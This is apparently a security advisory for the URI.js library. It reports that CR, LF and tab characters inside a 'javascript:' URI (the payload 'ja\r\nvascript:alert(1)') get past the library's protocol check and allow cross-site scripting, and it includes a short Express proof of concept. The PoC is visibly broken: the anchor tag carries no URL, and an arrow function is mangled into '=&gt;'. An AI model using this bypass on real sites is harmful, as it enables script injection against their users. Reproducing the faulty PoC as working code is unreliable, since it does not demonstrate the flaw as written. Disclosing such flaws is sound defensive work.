Description

\r, \n, \t characters in the URI can lead to XSS as URI.js will fail to extract javascript: protocol from a URI. See Section 4.4 Step 3 “Remove all ASCII tab or newline from input.” of the WHATWG URL spec.

Proof of Concept

const parse = require('urijs')
const express = require('express')
const app = express()
const port = 3000

input = "ja\r\nvascript:alert(1)"
url = parse(input)

console.log(url)

app.get('/', (req, res) => {
  if (url.protocol !== "javascript:") {res.send("<a href>CLICK ME!</a>")}
})

app.listen(port, () =&gt; {
  console.log(`Example app listening on port ${port}`)
})

Run the above and click on the CLICK ME, applications using URI.js to check for javascript: protocol will still be vulnerable to XSS.

Impact

This vulnerability is capable of incorrect protocol extraction potentially leading to XSS.